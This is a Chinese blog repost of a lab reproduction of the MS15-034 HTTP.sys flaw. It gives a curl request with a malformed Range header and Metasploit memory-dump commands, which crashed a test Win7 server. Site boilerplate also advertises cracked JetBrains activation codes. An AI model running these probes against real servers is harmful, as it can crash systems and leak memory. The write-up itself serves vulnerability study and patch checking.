HTTP.SYS远程代码执行漏洞(MS15-034)

HTTP.SYS远程代码执行漏洞(MS15-034)目录简介影响范围危害漏洞复现win2008r2换成win7利用msf简介漏洞编号:CVE-2015-1635(MS15-034)远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。影响范围任何安装了微软IIS6.0以上的WinServer2008R2、Win…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

目录

 

简介

影响范围

危害

漏洞复现

win2008 r2

换成win7

利用msf


简介

漏洞编号:CVE-2015-1635(MS15-034 )

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,
当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

影响范围

任何安装了微软IIS 6.0以上的
    Win Server 2008 R2、 
    Win Server 2012、
    Win Server 2012 R2、
    Win 7、
    Win 8、
    Win 8.1

危害

(1)远程读取IIS服务器的内存数据,
(2)使服务器系统蓝屏崩溃。

漏洞复现

win2008 r2

环境:win2008 r2 ,iis7.5

(一)利用curl

curl -v IP -H “Host:irrelevant” -H “Range: bytes=0-18446744073709551615”

用的时候仅仅修改IP就行;这个IP可以是:纯IP、IP加端口号、域名。

如果服务器存在HTTP.SYS远程代码执行漏洞,那么响应状态应该有:

 HTTP/1.1 416 Requested Range Not Satisfiable

如果服务器打上了补丁,那么响应状态应该是:

HTTP Error 400. The request has an invalid header name.

HTTP.SYS远程代码执行漏洞(MS15-034)  进行发包,这里并没有成功,不存在这个漏洞

HTTP.SYS远程代码执行漏洞(MS15-034)

 

换成win7

win7安装iis服务 https://jingyan.baidu.com/article/219f4bf723bcb2de442d38ed.html

web界面如下

HTTP.SYS远程代码执行漏洞(MS15-034)

发送数据包,漏洞存在

HTTP.SYS远程代码执行漏洞(MS15-034)

利用msf

search ms 15-034
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts xxx
run

但是这里的状态码并不是  HTTP/1.1 416 Requested Range Not Satisfiable,但还是成功了

服务器瞬间蓝屏然后重启了

HTTP.SYS远程代码执行漏洞(MS15-034)

                                                                                                                                                                                                —— 心,若没有栖息的地方,到哪里都是流浪

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/161405.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号